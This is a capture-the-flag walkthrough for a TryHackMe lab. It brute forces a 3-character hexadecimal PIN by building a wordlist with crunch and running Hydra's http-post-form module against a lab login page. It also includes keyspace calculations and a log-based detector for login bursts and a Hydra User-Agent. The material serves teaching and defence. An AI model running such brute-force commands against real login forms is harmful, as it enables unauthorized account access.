THM day 3 - Advent of Cyber

The third day is about brute forcing and counting PIN and password possibilities. I have to brute force a secret PIN: I use Crunch to generate a wordlist and Hydra to brute force the PIN.

A lot of systems rely on PIN codes or password authentication; these systems can easily be attacked if no countermeasures are taken.

Imagine we have a four-digit PIN: each position can be any of the ten digits (0,1,2,3,4,5,6,7,8,9), so there are 10^4 = 10,000 possibilities.

Imagine the following scenario, where each character of a password can be:

  • A digit 0-9
  • Uppercase letter A-Z
  • Lowercase letter a-z

Each character can be one of 62 choices. If the password were 8 characters long, we could make 62^8 = 218,340,105,584,896 different passwords.
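The keyspace arithmetic above, carried through in code as an added example (mine, not part of the original write-up). It computes the size of a keyspace for any alphabet and length, generates the candidate list in the same order crunch emits it, and estimates how long online guessing takes at a fixed attempt rate, with and without a server-side throttling policy. The attempt rate (100 guesses/s) and the throttling policy (5 guesses per 15 minutes) are constructed figures, not measurements from the room.

```python
from itertools import product

# Character sets from the write-up above.
DIGITS = "0123456789"
ALNUM = DIGITS + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz"
HEX = "0123456789ABCDEF"


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct secrets of `length` symbols drawn from an alphabet of `alphabet_size` symbols."""
    return alphabet_size ** length


def wordlist(alphabet: str, length: int) -> list:
    """Every candidate in the keyspace, in the order crunch emits them (the first position
    changes slowest); for HEX and length 3 this is what `crunch 3 3 0123456789ABCDEF` writes."""
    return ["".join(symbols) for symbols in product(alphabet, repeat=length)]


def brute_force_seconds(space: int, attempts_per_second: float, worst_case: bool = False) -> float:
    """Online guessing time against a uniformly random secret at a fixed attempt rate.
    On average half the keyspace is tried before the hit; the worst case is all of it."""
    tries = space if worst_case else space / 2
    return tries / attempts_per_second


def brute_force_seconds_with_lockout(space: int, attempts_per_window: int, window_seconds: float,
                                     worst_case: bool = False) -> float:
    """Same estimate when the server allows only `attempts_per_window` guesses per window
    (throttling / lockout). The effective rate is then capped by policy, not by how many
    parallel tasks the attacker runs."""
    return brute_force_seconds(space, attempts_per_window / window_seconds, worst_case)


def human(seconds: float) -> str:
    """Render a duration in the largest sensible unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


if __name__ == "__main__":
    RATE = 100.0                 # assumed attempt rate, constructed figure
    PER_WINDOW, WINDOW = 5, 900  # assumed throttling policy: 5 guesses per 15 minutes, constructed

    for name, alphabet, length in (("4-digit PIN", DIGITS, 4),
                                   ("3-hex PIN (this room)", HEX, 3),
                                   ("8-char alnum", ALNUM, 8)):
        space = keyspace(len(alphabet), length)
        print(f"{name:22} keyspace={space:>22,}  "
              f"unthrottled~{human(brute_force_seconds(space, RATE)):>16}  "
              f"throttled~{human(brute_force_seconds_with_lockout(space, PER_WINDOW, WINDOW)):>16}")

    words = wordlist(HEX, 3)
    print(len(words), words[:3], words[-3:])
```

The point of the throttled column is that the keyspace alone does not decide the outcome: a 4096-entry PIN space falls in seconds when the server accepts guesses as fast as Hydra sends them, but takes days under a modest lockout policy, while an 8-character alphanumeric password is out of reach online either way.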

Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Opening the website shows the following interface, with the options 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F: all the hexadecimal symbols.


There is a maximum of 3 characters to be filled in.

With a wrong code, access is denied.

In order to get in, I need to brute force the password.

Crunch is an amazing tool, since it takes one command to generate a wordlist with all the possibilities (minimum and maximum length 3, drawn from the 16 hexadecimal characters):
crunch 3 3 0123456789ABCDEF -o 3digits.txt

DuxSec@hi$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096

crunch: 100% completed generating output
DuxSec@hi$ tail 3digits.txt
FF6
FF7
FF8
FF9
FFA
FFB
FFC
FFD
FFE
FFF

Great, I have all the options; the next step is to automate the 'login' process using Hydra.

Capturing an invalid login attempt shows me the details of the request. It sends a POST request to /login.php with the body pin=<my_pin>.

With that information I can create the command to brute force. -l '' sets an empty username (the form has none), -P points at the wordlist, -s 8000 is the port, and the http-post-form module takes the path, the POST body with ^PASS^ as the placeholder for each candidate, and the string that marks a failed attempt in the response:
hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied"

DuxSec@hi$ hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 11:50:44
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.188.183:8000/login.php:pin=^PASS^:Access denied
[8000][http-post-form] host: 10.10.188.183   password: 6F5
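Seen from the server side, the run above is 4096 POSTs to /login.php from one address in a short burst (16 tasks, ~256 tries each). As an added example, not part of the original write-up, here is a small detector that parses web-server access logs in the Apache/nginx combined format, flags any source IP that sends more than a threshold of POSTs to the login path inside a sliding window, and separately lists IPs whose User-Agent contains "Hydra". The log lines are constructed in the block itself, not captured from the room; the Hydra User-Agent marker is assumed from Hydra's HTTP modules' default and is deliberately treated as a weak, secondary signal because it is trivial to change.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Optional

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed default User-Agent marker of Hydra's HTTP modules; weak signal, easily overridden.
HYDRA_UA_MARKER = "Hydra"


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bursts(lines, path="/login.php", threshold=20, window_seconds=60):
    """Flag each source IP that sends at least `threshold` POSTs to `path` within any
    sliding window of `window_seconds`. Returns one alert per offending IP."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            stamps_by_ip[rec["ip"]].append(rec["ts"])

    alerts = []
    window = timedelta(seconds=window_seconds)
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"ip": ip, "first_seen": stamps[start], "count": end - start + 1})
                break                            # one alert per IP is enough
    return alerts


def hydra_user_agent_ips(lines) -> list:
    """Secondary indicator: IPs whose User-Agent contains the Hydra marker."""
    hits = {rec["ip"] for rec in map(parse_line, lines) if rec and HYDRA_UA_MARKER in rec["ua"]}
    return sorted(hits)


def constructed_log() -> list:
    """Constructed sample traffic (not captured from the room): one real user who mistypes the
    PIN a few times, and one host behaving like the Hydra run in the write-up. Failed logins
    return 200 with 'Access denied' in the body, so status codes alone would not separate them."""
    base = datetime(2023, 12, 14, 11, 50, 44, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "{ua}"'
    browser = "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
    lines = [fmt.format(ip="192.0.2.10", ts=base.strftime(TS_FMT), method="GET", path="/", ua=browser)]
    for offset in (5, 40, 115):                   # three wrong PINs spread over two minutes
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        lines.append(fmt.format(ip="192.0.2.10", ts=ts, method="POST", path="/login.php", ua=browser))
    for i in range(200):                          # 16 tasks pushing ~20 guesses/s for 10 seconds
        ts = (base + timedelta(seconds=i // 20)).strftime(TS_FMT)
        lines.append(fmt.format(ip="198.51.100.7", ts=ts, method="POST", path="/login.php",
                                ua="Mozilla/5.0 (Hydra)"))
    return lines


if __name__ == "__main__":
    log = constructed_log()
    for alert in detect_login_bursts(log):
        print(f"ALERT {alert['ip']}: {alert['count']} POST /login.php within 60s "
              f"starting {alert['first_seen']:%H:%M:%S}")
    print("Hydra user-agent seen from:", hydra_user_agent_ips(log))
```

The rate-based rule is the one to rely on: the legitimate user's three failures never cross the threshold, while the guessing host crosses it within its first second. Tune `threshold` and `window_seconds` to the real login rate of the application, and feed the alert into whatever lockout or blocking mechanism the server offers.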

And Hydra found the password: 6F5. Trying it successfully logs me in.


  • Use long passwords
  • Hydra is a great tool to brute force
  • Crunch is amazing at generating custom wordlists